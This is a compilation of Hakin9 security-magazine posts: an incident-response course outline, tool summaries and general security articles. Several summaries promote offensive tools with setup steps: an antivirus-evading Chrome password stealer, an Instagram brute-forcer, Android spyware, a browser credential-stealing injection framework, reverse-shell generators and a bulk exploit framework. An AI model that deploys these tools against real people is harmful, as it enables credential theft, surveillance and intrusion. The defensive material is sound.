Participants will be able to clearly define a security incident and know the proper way to handle it. The participants will also be able to define the steps needed to lead the incident to a desired outcome throughout the process of investigation.

You will find out how to:

• Detect, identify, and mitigate threats
• Assess potential security risks
• Account for human error
• Create an Incident Response Plan
• Identify High Value Targets
• Set up Incident Response tooling
• Create IoCs and implement them
• Recover systems, data and connectivity
• Return to production state
• Document the incident

Example tools used in the course:

• Windows built-in tools;
• Windows Sysinternals suite (pslist; psexec – relation output; autoruns – how to use and how it is useful in incident response; listdlls; procexp/procexp64; tcpview; LogonSessions);
• Volatility;
• dd/windd;
• Logparser;
• grep and Windows Event Log Explorer

In module 1, we will study:

• Assessing potential security risks
• Accounting for human error
• Creating Incident Response Plan
• Identifying High Value Targets
• Identifying Stakeholders
• Setting up incident Response tooling
• System instrumentation
• Employees security trainings

Module 1 exercises:

Familiarizing with Windows Sysinternals suite (pslist; psexec – relation output; autoruns – how to use and how it is useful in incident response; listdlls; procexp/procexp64; tcpview; logonsessions) and Windows Event Log analysis

Check out other modules here! 

Related content:

8 Free Tools to Automate Your Incident Response Process by Gilad David Maayan

Incident Response: Should You Prioritise Quality or Quantity? by AlertOps

Incident Security Response - AccessEnum [FREE COURSE CONTENT!]

Security Incident Response (W43)

TuxResponse - Linux Incident Response

misp - A dashboard for a real-time overview of threat intelligence from MISP instances

The post LogonSessions for Incident Response [FREE COURSE CONTENT] appeared first on Hakin9 - IT Security Magazine.

Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis

wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

Python stuff and Celery

You must install the libraries inside requirements.txt

python3 -m pip install -r requirements.txt

Install Frontend

Node

First of all, install nodejs.

Dependencias

Inside the directory, frontend install the dependencies

cd frontend
npm install

Wake up iKy Tool

Turn on Backend

Redis

Turn on the server in a terminal

redis-server

Python stuff and Celery

Turn on Celery in another terminal, within the directory backend

./celery.sh

Again, in another terminal turn on backend app from directory backend

python3 app.py

Turn on Frontend

Finally, to run frontend server, execute the following command from directory frontend

npm start

Screen after turn on iKy

Demo:

Wiki Page: https://gitlab.com/kennbroorg/iKy/-/wikis/home

More: https://gitlab.com/kennbroorg/iKy

The post Project iKy - Tool That Collects Information From An Email appeared first on Hakin9 - IT Security Magazine.

Chromepass is a python-based console application that generates Windows executable with the following features:

• Decrypt Chrome saved passwords
• Send a file with the login/password combinations remotely (email or reverse-HTTP)
• Custom icon
• Completely undetectable by AntiVirus Engines

AV Detection!

Due to the way this has been coded, it is currently fully undetected. Here are some links to scans performed using a variety of websites

• VirusTotal Scan (0/68) 30-09-2019
  • this is an educational project, so distribution (or the lack thereof) is not a concern, hence the usage of VirusTotal
• AntiScan (0/26) 24-09-2019
• Hibrid Analysis All Clean (CrowdStrike Falcon, MetaDefender and Virustotal) 24-09-2019

Getting started

Dependencies and Requirements

This is a very simple application, which uses only:

• Python - Only tested on 3.7.4 but should work in 3.6+

Installation

Chromepass requires Python 3.6+ to run.

Install the dependencies:

> cd chromepass
> pip install -r requirements.txt

If any errors occur, to make sure you're running on the proper environment (if applicable) and that you have python 3.6+ (preferably 3.7.4). If the errors persist, try:

> python -m pip install --upgrade pip
> python -m pip install -r requirements.txt

Usage

Chromepass is very straightforward. Start by running:

> python create_server.py

It will ask you to select between two options:

• (1) via email [To be fixed]
  • This will ask you for an email address and a password
  • It will then ask you if you wish to send to another address or to yourself
  • Next, you're asked if you want to display an error message. This is a fake message that if enabled will appear when the victim opens the executable after the passwords have been transferred.
  • You can then write your own message or leave it blank
  • You're done! Wait for the executable to be generated and then it's ready.
• (2) via client.exe [Recommended at the moment]
  • First, you're asked to input an IP Address for a reverse connection. This is the address that belongs to the attacker. It can be a local IP address or a remote IP Address. If a remote address is chosen, Port Forwarding needs to be in place.
  • You're then asked if you want to display an error message. This is a fake message that if enabled will appear when the victim opens the executable after the passwords have been transferred.
  • You can then write your own message or leave it blank
  • You're done! Wait for the executables to be generated and then it's ready.
  • The client.exe must be started before the server_ip.exe. The server_ip.exe is the file the victim receives.
• Note: To set a custom icon, replace icon.ico by the desired icon with the same name and format.

Todo

• Sending Real-time precise location of the victim (completed, releases next update)
• Also steal Firefox passwords (Completed, releases next update)
• The option of installing a backdoor allowing remote control of the victim's computer (completed, releases next update)
• Support for more email providers (in progress)
• Also steal passwords from other programs, such as keychains(in progress)
• Add Night Mode (in progress)

Errors, Bugs, and feature requests

If you find an error or a bug, please report it as an issue. If you wish to suggest a feature or an improvement please report it in the issue pages.

Please follow the templates shown when creating the issue.

Learn More

For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran, join our Discord Server: WhiteHat Hacking

If you wish to contact me, you can do so via: marionascimento@itsec.us

Disclaimer

I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.

More: https://github.com/darkarp/chromepass

The post Chromepass - Hacking Chrome Saved Passwords appeared first on Hakin9 - IT Security Magazine.

Tentacle is a POC vulnerability verification and exploits framework. It supports the free extension of exploits and uses POC scripts. It supports calls to zoomeye, fofa, shodan, and other APIs to perform bulk vulnerability verification for multiple targets. (Still in DEV...)

Install

pip3 install -r requestment.txt

Usage

When you run it for the first time, the configuration file conf/tentacle.conf will be generated automatically.

# Show help for tentacle.
python3 tentacle.py --help

# Show all modual, and you can see it in `script` path.
python3 tentacle.py --show

# Show all function of module by -f show or -f help
python3 tentacle.py -m script/web/web_status -f show
python3 tentacle.py -m script/web/web_status -f help

# Load target by iS/iN/iF/iT/iX/iE/gg/sd/ze/ff.
# Scan port and then it will try to send the poc.
python3 tentacle.py -m script/web/web_status -iS www.examples.com             # Load target by url or host 
python3 tentacle.py -m script/web/web_status -iN 192.168.111.0/24             # Load target by network
python3 tentacle.py -m script/web/web_status -iF target.txt                   # Load target by file
python3 tentacle.py -m script/web/web_status -iT dcc54c3e1cc2c2e1             # Load target by recode's target
python3 tentacle.py -m script/web/web_status -iX nmap_xml.xml                 # Load target by nmap.xml
python3 tentacle.py -m script/web/web_status -iE "powered by discuz"          # Load target by baidu/bing/360so
python3 tentacle.py -m script/web/web_status -gg 'intext:powered by discuz'   # Load target by google api
python3 tentacle.py -m script/web/web_status -sd 'apache'                     # Load target by shodan api
python3 tentacle.py -m script/web/web_status -ze 'app:weblogic'               # Load target by zoomeye api
python3 tentacle.py -m script/web/web_status -ff 'domain="example.com"'       # Load target by fofa api

# Load modual by -m (e.g. script/info/web_status,@web)
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status                    # Load web_status module
python3 tentacle.py -iS 127.0.0.1 -m @web                                     # Load all module of web path
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status,@web               # Load all module of web path and web_status module
python3 tentacle.py -iS 127.0.0.1 -m "*"                                      # Load all module of script path

# Set port scan scope
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status                    # Scan top 150 ports and then perform bulk vulnerability verification for multiple targets.
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status -sP                # Skip port scan and then it will try the default port number server
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status -lP 80-90,443      # Scan 80-90 ports and 443 port and then perform bulk vulnerability verification for multiple targets.

# Use function of modual by -m and -f  (e.g. -m web_status -f prove), and you should make sure the function of module is exist.
python3 tentacle.py -m script/web/web_status -f prove

# Show task's result by -tS 
python3 tentacle.py -tS 8d4b37597aaec25e

# Export task's result by -tS to test.xlsx
python3 tentacle.py -tS 8d4b37597aaec25e  -o test

# Update by git
python3 tentacle.py --update

Update

• [2018-11-15] Code refactoring and fix the bug.
• [2019-06-08] Code refactoring and add port scan.
• [2020-03-15] Code refactoring and add the script.

Thanks

1. Sqlmap
2. POC-T

More: https://github.com/orleven/Tentacle

The post Tentacle - A POC Vulnerability Verification And Exploit Framework appeared first on Hakin9 - IT Security Magazine.

Instashell is an Shell Script to perform multi-threaded brute force attack against Instagram, this script can bypass login limiting and it can test infinite number of passwords with a rate of +400 passwords/min using 20 threads.

Legal disclaimer:

Usage of InstaShell for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Features

• Multi-thread (400 pass/min, 20 threads)
• Save/Resume sessions
• Anonymous attack through TOR
• Check valid usernames
• Default password list (best +39k 8 letters)
• Check and Install all dependencies

Usage:

git clone https://github.com/thelinuxchoice/instashell
cd instashell
chmod +x instashell.sh
service tor start
sudo ./instashell.sh

Install requirements (Curl, Tor, Openssl):

chmod +x install.sh
sudo ./install.sh

How does it work?

The script uses an Android ApkSignature to perform authentication, in addition, using TOR and rotating the ip address to avoid blocking. The script uses Instagram-py algorithm, see the project at: https://github.com/antony-jr/instagram-py

Author: github.com/thelinuxchoice

IG: instagram.com/thelinuxchoice

Don't copy this code without giving me the credits, nerd!

Instashell is a Shell Script to perform a multi-threaded brute force attack against Instagram, this script can bypass login limiting and it can test an infinite number of passwords with a rate of +400 passwords/min using 20 threads.

Donate!

Support the authors:

More: https://github.com/thelinuxchoice/instashell

Tool developer: github.com/thelinuxchoice

The post Instashell - Multi-threaded Instagram Brute Forcer without password limit appeared first on Hakin9 - IT Security Magazine.

"Print My Shell" is a python script, wrote to automate the process of generating various reverse shells based on PayloadsAllTheThings and Pentestmonkey reverse shell cheat sheets.

Using this script you can easily generate various types of reverse shells without leaving your command line. This script will come in handy when you are playing CTF like challenges.

Available Shell Types

• Bash
• Perl
• Ruby
• Golang
• Netcat
• Ncat
• Powershell
• Awk
• Lua
• Java
• Socat
• Nodejs
• Telnet
• Python

Git Installation

# clone the repo
$ git clone https://github.com/sameera-madushan/Print-My-Shell.git

# change the working directory to Print-My-Shell
$ cd Print-My-Shell

Usage

usage: shell.py [-h] [-i IPADDR] [-p PORTNUM] [-t TYPE] [-l] [-a]

optional arguments:
  -h, --help            show this help message and exit
  -i IPADDR, --ip IPADDR
                        IP address
  -p PORTNUM, --port PORTNUM
                        Port number
  -t TYPE, --type TYPE  Type of the reverse shell to generate
  -l, --list            List all available shell types
  -a, --all             Generate all the shells

Support & Contributions

• Please this repository if this project helped you!
• Contributions of any kind welcome!

References

Payloads All The Things Reverse Shell Cheat Sheet

Pentestmonkey Reverse Shell Cheat Sheet

More: https://github.com/sameera-madushan/Print-My-Shell

The post Print-My-Shell: Python script wrote to automate the process of generating various reverse shells. appeared first on Hakin9 - IT Security Magazine.

UTM is a full-featured virtual machine host for iOS. In short, it allows you to run Windows, Android, and more on your iPhone and iPad. More information at https://getutm.app/

Features

• 30+ processors supported including x86_64, ARM64, and RISC-V thanks to qemu as a backend
• Fast native graphics through para-virtualization thanks to SPICE
• JIT based acceleration using qemu TCG
• Frontend designed from scratch for iOS11+ using the latest and greatest APIs
• Create, manage, run VMs directly from your device
• No jailbreak required!

Install

If you just want to use UTM, this is not the right place! Visit https://getutm.app/install/ for directions.

Building

Make sure you have cloned with submodules git submodule update --init --recursive.

Easy

The recommended way to obtain the dependencies is to use the built artifacts from Github Actions. Look for the latest build and download the Sysroot artifact from either the arm64 build (for iOS) or x86_64 build (for iOS Simulator). Then unzip the artifact to the root directory of UTM. You can then open UTM.xcodeproj, select your signing certificate, and then run UTM from Xcode.

Advanced

If you want to build the dependencies yourself, it is highly recommended that you start with a fresh macOS VM. This is because some of the dependencies attempt to use /usr/local/lib even though the architecture does not match. Certain installed libraries like libusb and gawk will break the build.

1. Install Xcode command line and the following build prerequisites brew install bison pkg-config gettext glib libgpg-error nasm Make sure to add bison to your $PATH environment!
2. git submodule update --init --recursive if you haven't already
3. Run ./scripts/build_dependencies.sh to start the build. If building for the simulator, run ./scripts/build_dependencies.sh -a x86_64 instead.
4. Open UTM.xcodeproj and select your signing certificate
5. Build and deploy from Xcode

Signing

If you build with Xcode, signing should be done automatically. iOS 13.3.1 is NOT supported due to a signing bug. You can use any version lower or higher than 13.3.1.

Signing Release

The ipa releases are fake-signed. If you are jailbroken, you should NOT sign it. You can install it directly with Filza.

If you want to sign the release for stock devices, there are a variety of ways. The recommended way is with iOS App Signer. Note there are known issues with many "cloud" signing services such as AppCake and they do not work with UTM. If you get a crash while trying to launch a VM, then your signing certificate was invalid.

In more technical detail, there are two kinds of signing certificates: "development" and "distribution". UTM requires "development" which has the get-task-allow entitlement.

Signing Development Build

If you want to sign an xcarchive such as from a Github Actions built artifact, you can use the following command:

./scripts/resign.sh UTM.xcarchive outputPath PROFILE_NAME TEAM_ID

Where PROFILE_NAME is the name of the provisioning profile and TEAM_ID is the identifier next to the team name in the provisioning profile. Make sure the signing key is imported into your keychain and the provisioning profile is installed on your iOS device.

If you have a jailbroken device, you can also fake-sign it (with ldid installed):

./scripts/resign.sh UTM.xcarchive outputPath

Why isn't this in the AppStore?

Apple does not permit any apps that have interpreted or generated code therefore it is unlikely that UTM will ever be allowed. However, there are various ways people on the internet have come up to sideload apps without requiring a jailbreak. We do not condone or support any of these methods.

License

UTM is distributed under the permissive Apache 2.0 license. However, it uses several (L)GPL components. Most are dynamically linked but the gstreamer plugins are statically linked and parts of the code are taken from qemu. Please be aware of this if you intend on redistributing this application.

More:

https://github.com/utmapp/UTM

https://getutm.app/

The post UTM - a full featured virtual machine host for iOS. appeared first on Hakin9 - IT Security Magazine.

Inhale is a malware analysis and classification tool that is capable of automating and scaling many static analysis operations. This is the beta release version, for testing purposes, feedback, and community development.

Background

Inhale started as a series of small scripts that I used when collecting and analyzing a large amount of malware from diverse sources. There are plenty of frameworks and tools for doing similar work, but none of them really matched my workflow of quickly finding, classifying, and storing information about a large number of files. Some also require expensive API keys and other services that cost money.

I ended up turning these scripts into something that people can quickly set up and use, whether you run from a research server, a laptop, or a low-cost computer like a Raspberry Pi.

Install

This tool is built to run on Linux using Python3, ElasticSearch, radare2, yara and binwalk. jq is also needed to pretty print output from the database. Here are some of the basic instructions to install.

Python3

Install requirements

python3 -m pip install -r requirements.txt

Installing ElasticSearch (Debian)

Documentation

wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
sudo apt-get install apt-transport-https
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt-get update && sudo apt-get install elasticsearch
sudo service elasticsearch start

You can also install manually by following this documentation

Additionally, you can set up a full ELK stack for visualization and data analysis purposes. It is not necessary for using this tool.

Installing radare2

It's important to install radare2 from the repo, and not your package manager. Package manager versions don't come with all the bells and whistles required for inhale.

git clone https://github.com/radare/radare2
cd radare2
sys/install.sh

Installing Yara

Documentation

sudo apt-get install automake libtool make gcc
wget https://github.com/VirusTotal/yara/archive/v3.10.0.tar.gz
tar xvzf v3.10.0.tar.gz
cd yara-3.10.0/
./bootstrap.sh
./configure
make
sudo make install

If you get any errors about shared objects, try this to fix it.

sudo sh -c 'echo "/usr/local/lib" >> /etc/ld.so.conf'
sudo ldconfig

Installing binwalk

It's most likely best to simply install binwalk from the repo.

git clone https://github.com/ReFirmLabs/binwalk
cd binwalk
sudo python3 setup.py install

More information on installing additional features for binwalk is located here.

Usage

Specify the file you are scraping by type:

-f infile    
-d directory
-u url
-r recursive url

Other options:

-t TAGS        Additional Tags
-b             Turn off binwalk signatures with this flag
-y YARARULES   Custom Yara Rules
-o OUTDIR      Store scraped files in specific output dir (default:./files/<date>/)
-i             Just print info, don't add files to database

Examples

Running inhale.py will perform all of the analysis on a given file/directory/url and print it to your terminal.

View info on /bin/ls, but don't add to the database

python3 inhale.py -f /bin/ls -i 

Add directory 'malwarez' to database

python3 inhale.py -d malwarez

Download this file and add to the database

python3 inhale.py -u https://thugcrowd.com/chal/skull

Download everything in this remote directory, tag it all as "phishing":

python3 inhale.py -r http://someurl.com/opendir/ -t phishing

PROTIP: Use this Twitter hashtag search to find interesting open directories that possibly contain malware. Use it at your own risk.

Yara

You can pass your own yara rules with -y, this is a huge work in progress and almost everything in "YaraRules" is from https://github.com/kevthehermit/PasteHunter/tree/master/YaraRules. Shoutout @KevTheHermit

Querying the Database

Use db.sh to query (Soon to be a nice script)

db.sh *something* | jq .

Data Model

The following is the current data model used for the elasticsearch database. Not every one of these will be used for every given file. Any r2_* tags are typically reserved for binaries of some sort.

Solutions to Issues

There are some known issues with this project (mainly to do with versions from package managers), and here I will track anything that has a solution for it.

ElasticSearch index field limit

If you get an error like this:

elasticsearch.exceptions.RequestError: RequestError(400, 'illegal_argument_exception', 'Limit of total fields [1000] in index [inhaled] has been exceeded')

You may have an older version of elasticSearch. You can upgrade, or you can increase the fields limit with this one liner.

curl -XPUT 'localhost:9200/inhaled/_settings' -H 'Content-Type: application/json' -d'{ "index" : { "mapping" : { "total_fields" : { "limit" : "100000" }}}}'

Future Features

• Re-doing the bot plugin for Discord / Matrix
• Additional binary analysis features - pulling import/export tables, hashing of specific structures in the header, logging all strings, etc.
• Checking if the file is the database before adding. This feature was removed previously due to specific issues with older versions of ES.
• Configuration options for requests such as user-agent, timeout, proxy, etc.
• Dockerization of this entire project.

Contribution

PRs are welcome! If you want to give specific feedback, you can also DM me @netspooky on Twitter.

Thanks

I'd like to thank everyone who helped to test this tool with me. I'd also like to thank Plazmaz for doing an initial sweep of the code to make it a bit neater.

Greetz to: hermit, plazmaz, nux, x0, dustyfresh, aneilan, sshell, readme, dnz, notdan, rqu, specters, nullcookies, ThugCrowd, and everyone involved with ThreatLand and the TC Safari Zone.

More: https://github.com/netspooky/inhale

The post Inhale - A malware analysis and classification tool. appeared first on Hakin9 - IT Security Magazine.

When the year began, none of us imagined that in just under three months our lives would change so drastically. Due to the Coronavirus pandemic, life as we knew it has changed entirely. And it is affecting many different aspects of life. However, here we are only going to be talking about the kind of havoc the pandemic has on cybersecurity. 

The matter of cybersecurity is a delicate one, with new malware and threats endangering the security of websites on a daily basis. With the changes brought on in our lives by the Coronavirus threat, the cybersecurity sector is also seeing the rise of new types of threats against businesses and individuals. 

 Coronavirus Threats: What Should We Prepare For?

Thanks to the social distancing and quarantine measures taken across the world, most of us are working from home. This increases the risk of business data and threatens the integrity of the business. Every home PC, laptop and mobile device that is being used to access company data is not as secure as the company devices. As a result, hackers have an easier entry point to the company database, and they can easily manipulate the database from there. 

Added to this, there is also another threat that is using the global pandemic fear to manipulate the users. The scam emails and messages with the links are being circulated among users disguised as emails and messages from organizations such as WHO (World Health Organization) and CDC (The Centers for Disease Control and Prevention). The moment the users click on the links provided on these mails, malicious software is downloaded into the system.

Both types of threats are exploiting a pandemic situation and panic about it. In addition to all these, there are now Coronavirus themed malware designed to clear out the entire system. According to the source, these malware are designed to destroy rather than act as ransomware. All in all, this Coronavirus situation has proven to be harmful not only for our health, but the cyber world as well. 

COVID-19: The Work from Home Threat

The firewalls and protective protocols used for a home internet system are adequate for personal use. However, these personal web access points are not equipped with the proper safety tools to support the huge demands of a work from home operation. 

A company’s access points on the other hand are equipped with multiple safety measurements to reduce the chances of cyber attacks and make the company data secure. But when these data are being accessed from the home networks on a daily basis for at least a three week time period, the danger becomes very real. 

Every vulnerable device used to access the data can be considered as a point of entry for the hackers. This increases the chances of attack on the database. The main reason why this kind of cyber threat has become a focal point is the time crunch. Usually, companies require months or years to analyze, develop, test and deploy solutions for such cyber risks. However, this time around, they only had a few days warning before they all had to go into quarantine. 

With the world economy already in danger, these kinds of data breaches can prove to be fatal. And that’s why it is necessary that both the company and employees working from home take some extra precautions while accessing the company data from their home system.

• Analyzing The Security Vulnerabilities

Analyzing the security instability beforehand is necessary for any company. This way, they have a better chance of understanding the weak points and can take precautionary steps. 

• Drawing Up A Detailed Security Protocol

A precise security protocol for working from home needs to exist whether there is urgency or not. This is the document workers would refer to when they are facing any kind of confusion regarding enhancement of security. 

• Using Only Updated Software On The System

This one is for the employees. 

It is imperative to use the latest versions of the apps when working from home. These revised versions come with proper security patches and help secure the databases against online attacks. So before you start working from home, install the latest version of your system. 

• Securing The Home Network Access Point

The main difference between a home network and an office network is the level of online safety. It is crucial that the access points of the home network are secured and that no one else can hack it. This way, employees can reduce the chances of anyone else snooping around in their files. 

• Using VPN

Using a virtual private network can help users increase security levels when working from home. Corporate VPNs will protect the users from phishing and malware attacks better than anything else. 

If we consider it, we would understand that companies are a lot better equipped to handle a data breach, if it happens. But what happens when an individual is manipulated because of their panic and fear?

The Panic Manipulation: Threats Faced By Individuals

If the fear and panic over the global pandemic was not enough, now there is a new cybersecurity threat aimed at those who are trying to stay safe during this trying time. 

Using the very basic method of scam emails, hackers are sending emails with malicious links camouflaged as emails from credible sources such as WHO and CDC. The moment users click on this link, malicious software is installed on the system ready to harm it. 

These phishing emails are succeeding for only one reason, and that is - the global panic. People want to find out all they can about this disease and how to save themselves from it. And that’s why people are clicking on the links that promise to provide them information on that. This is nothing but a sadistic manipulation of the users and their emotions. 

But is there any way of preventing these attacks? 

• Be Extra Careful About Opening Links From Emails

The scary part about these phishing attacks is the fact that more often than not these emails look legitimate. For an inexperienced user, figuring out the character of any email is a pretty tough job. And that’s why the users should be wary of any email that provides them with a direct link or CTA button to another process. In this case, rather than clicking on the link provided on the email, the users should type the name of the website on the search engine and check it out to see what the matter is about.

• Get Your Coronavirus Information Straight From The Websites

We have already mentioned before that the users are going to receive many emails telling them to download a file or visit a website from the mail to get the latest information on the Coronavirus situation. The best a user can do in this case is to get their information straight from the source, rather than an email.

• Learn The Signs Of A Phishing Email

It is not about becoming an expert on phishing scams. But learning all the signs of phishing scams on a primary scale can really benefit the users and help them  be safe online during this pandemic age. 

• Do Not Reveal Any Personal Data

Even if the user has accidentally landed on the phishing website, they don’t have to give any type of personal information such as email, physical address, financial information, etc. This way the personal information will stay safe even if you click on the link accidentally. 

Wrapping Up

Even though it is a major healthcare problem, the COVID-19 crisis has proven to be catastrophic in almost all areas of human life. There are some companies that are working on solutions to solve these security breaches. Hopefully these solutions will begin the effect before any type of big data breach takes place.

About the Author:

Jessica is an individual contributor for various leading publications. Writing about technology, design and the latest innovations is her primary knack. She also works for Unified Infotech, a technology service provider serving startups and enterprises. While not writing, Jessica can be found chilling with her martini.

Image Courtesy: https://www.helpnetsecurity.com/2020/03/18/healthcare-cybersecurity-coronavirus/

Reference:

https://www.govtech.com/blogs/lohrmann-on-cybersecurity/how-is-covid-19-creating-data-breaches.html

https://www.newelectronics.co.uk/electronics-blogs/covid-19-cyber-security-threat-to-impact-businesses/225701/

https://ciso.economictimes.indiatimes.com/news/cybercriminals-exploiting-public-fear-of-rising-covid-19/74621845

https://www.weforum.org/agenda/2020/03/covid-19-cyberattacks-working-from-home/

https://www.consumer.ftc.gov/articles/how-recognize-and-avoid-phishing-scams

https://us.norton.com/internetsecurity-online-scams-how-to-protect-against-phishing-scams.html

The post Cybersecurity In The Time Of Coronavirus by Jessica Bennett appeared first on Hakin9 - IT Security Magazine.

Injectify is a web based MiTM tool, similiar to BeEF (although completely unrelated in terms of source code). It uses modern web technologies such as ReactJS, Redux, Typescript and Webpack.

What can it do?

• Create a reverse Javascript shell between the victim and the attacker.
• PageGhost - see what's on the victim's screen and interact with it in realtime
• Highly integrated Module platform, with a high-level API
• Data extraction API - record custom data
  • Extracts and logs saved passwords from the browser.

Creating a MongoDB database

Creating an mLab database

1. Head over to mLab and create an account. Make sure to verify your email, if you don't then it won't allow you to create a database:

Click on Create new in the upper right corner

Select Sandbox and then click Continue

Select your preferred region and click Continue

Enter injectify as the database name, click Continue and then Submit order

Click on your new database and select Users and then Add database user

Choose a username and password and click Create (make sure read-only is left unchecked)

Creating a GitHub application

Head over to GitHub.com and create an account if you haven't already.

Create a new GitHub application and specify the following values:

Configuration

Tip: In order to actually use Injectify, you first have to setup the configuration file. In the future, you'll be able to do this from the web interface.

Clone this repo

Navigate into the repo and copy server.config.example.js to server.config.js

Open server.config.js in a text-editor

Replace the GitHub client_id and client_secret values with your newly created applications ones.

Replace the mongodb value with your newly created mLab URL (or dedicated MongoDB URI), in the format: mongodb://<dbuser>:<dbpassword>@XXXX.mlab.com:XXXX/injectify

Setting up the server

Note: This is where you actually install Injectify, you are required to have NodeJS pre-installed.

Prerequisites

• Followed the previous steps
• NodeJS
• Yarn package manager
• (Optional) A swap file - the reason being that Webpack uses loads of memory

Installing

Windows

npm i -g yarn
yarn global add typescript
yarn global add pm2
yarn run install:all
yarn run deploy

Linux

sudo npm i -g yarn
sudo yarn global add typescript
sudo yarn global add pm2
yarn run install:all
yarn run deploy

DEMO:

See more at the official documentation site

More: https://github.com/samdenty/injectify

The post Injectify - Perform advanced MiTM attacks on websites with ease. appeared first on Hakin9 - IT Security Magazine.

A cloud based Android Spying or Monitoring Tool, powered by NodeJS

NOTE: Read all steps carefully to setup XploitSPY as we keep changing them as per need

Features

• GPS Logging
• Microphone Recording
• View Contacts
• SMS Logs
• Send SMS
• Call Logs
• View Installed Apps
• View Stub Permissions
• Live Clipboard Logging
• Live Notification Logging (WhatsApp, Facebook, Instagram, Gmail and more ....)
• View WiFi Networks (logs previously seen)
• File Explorer & Downloader
• Command Queuing
• Built-In APK Builder

Prerequisites

• Java Runtime Environment 9+
  • See installation for OS specifics
• NodeJs
• A Server

Installation on Heroku

Video Tutorial for Heroku Click Here

0. Create an Account on Heroku
1. Click Create New App in Heroku Dashboard
2. Enter App Name and click on create an app
3. Now install Heroku CLI on your Computer Instructions
4. Now open your terminal and run the command git clone https://github.com/XploitWizer/XploitSPY
5. It will download Latest codes for you in your PC
6. Now change the directory to XploitSPY using the command cd XploitSPY
7. Now Login into Heroku CLI using the command heroku login -i now enter your login details and hit Enter
8. After Login run this command in terminal heroku git:remote -a appName here appName will be your app's name that you choose while creating the app.
9. Now run following commands in terminal to install packages

• heroku buildpacks:add heroku/jvm

then run

• heroku buildpacks:add heroku/nodejs

10. Now run this command in your terminal git push heroku master, if updating the existing app or face any error run this command git push -f heroku master 1
11. All done now it will take time to complete, after that you can visit your domain shown in terminal.

Installation on VPS or Server

Video Tutorial for VPS or Server Click Here

0. Connect to your server via SSH
1. Install JRE 9+
   • Debian, Ubuntu, Etc
     • sudo apt install openjdk-11-jre-headless
   • Fedora, Oracle, Red Hat, etc
     • sudo yum install java-11-openjdk-devel"
   • Windows
     • click HERE for downloads
2. Install NodeJS Instructions Here (If you can't figure this out, you shouldn't really be using this)
3. install PM2
   • sudo npm install pm2 -g
4. Clone this repository
   • git clone https://github.com/XploitWizer/XploitSPY.git
5. Now change to the server directory and run these commands
   • npm install <- install dependencies
   • sudo pm2 start index.js <-- start the script
   • sudo pm2 startup <- to run XploitSPY on startup
6. Default Username: admin & Default Password: password
7. In your browser navigate to http://<SERVER IP or URL>

NOTE: XploitSPY now works only on port 80 for both web and client

It's recommended to run XploitSPY behind a reverse proxy such as NGINX

Happy Hacking

Disclaimer

XploitWizer Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool. XploitSPY is built for Educational purposes. Use at your own risk.

Made with By XploitWizer

Credits

Credits to D3VL for the original code base this repository is based on at L3MON

More: https://github.com/XploitWizer/XploitSPY

The post XploitSPY is an Android Monitoring / Spying Tool appeared first on Hakin9 - IT Security Magazine.

Cloud computing transforms the way companies store and shares data, workloads, and applications. However, cloud environments also introduce a lot of new security threats and challenges, which often turn into easy marks for cybercriminals. This article reviews seven common security issues in cloud computing, including tips on how to overcome them.

What Is Cloud Security?

The goal of cloud security is to protect cloud-based infrastructure, data, and systems, from cyber attacks. Cloud security applies multiple levels of controls that mitigate DDoS attacks, support regulatory compliance, and protect customer data and privacy. Companies can create robust security environments by managing cloud security in one place.

The Difference Between On-Premises and Cloud Cyber Security

Cloud security and on-premises security differ in connectivity, required resources, and responsibilities, as explained in the table below.

7 Cloud Security Issues in Cloud Computing and How to Overcome Them

The following list reviews some of the most common risks cloud-based environments are facing, including tips on how to overcome them.

1. Data ownership and accountability 

Cloud servers are usually located at multiple geographical locations. Each server stores the data of multiple users, in one place. The cloud provider has to restrict access to your data and maintain confidentiality by separating your data from that of others. The provider also needs to ensure that data marked for deletion is removed as soon as possible.

Cloud providers need to be clear about how they secure your data. This includes encryption types, authentication protocols, and monitoring and reporting policies. In addition, providers have to specify where your data is stored and whether the compliance laws of that location are different. You should keep tabs on any policy changes to ensure your data is secured.

2. User privacy and secondary usage of data

You don’t always have full control over data stored in the cloud. As a result, your private data may be exposed and you won’t be able to prevent secondary usage of data. You also have to use many third-party integrations for cloud storage. These integrations are easy targets for hackers because they enable data sharing.

Verify the sharing settings of your cloud configuration and any third-party integrations you use. Conduct periodic checks of privacy policies to make sure that all services and products comply. In addition, make sure to include the required regulations in your Service-Level Agreement (SLA), since they may differ between cloud providers.

You can also use a Cloud Security Posture Management (CSPM) solution for securing cloud configurations. CSPM tools and processes enable you to proactively detect and prevent cloud security risks by focusing on compliance monitoring and security assessments across the entire cloud infrastructure. 

4. DDoS attacks

The goal of Distributed denial of service (DDoS) attacks is to make a web server unavailable by overwhelming them with fake traffic. DDoS attacks can render a website useless for hours or days. This can result in a decrease in customer trust, revenue loss, and damage to brand authority. 

Controlling DDoS attacks in cloud environments is a complex task because cloud computing is based on shared distributed resources and uses different virtualization technologies. 

You should invest in DDoS protection solutions that can protect against sophisticated DDoS threats at every network layer.

5. Regulatory compliance

Cloud providers need to protect your data across different locations and take appropriate actions when needed. However, you are responsible for verifying that your data is compliant to local regulations, properly backed-up, encrypted, and restricted. You need to migrate your data to another provider if you see that your current provider is not compliant.

6. Infrastructure security

You often cannot monitor proprietary cloud systems or processes. As a result, you cannot ensure that any cloud-based software or hardware is properly configured and updated. In addition, you sometimes cannot define who has administrative access to your set-up.

Tiering your cloud architecture and isolating infrastructure components with network Access Control Lists (ACLs) can reduce authorization risks. You can also configure administrative privileges only to specific people to limit access to the network. You should perform a periodic risk assessment to verify that your security measures are working as expected.

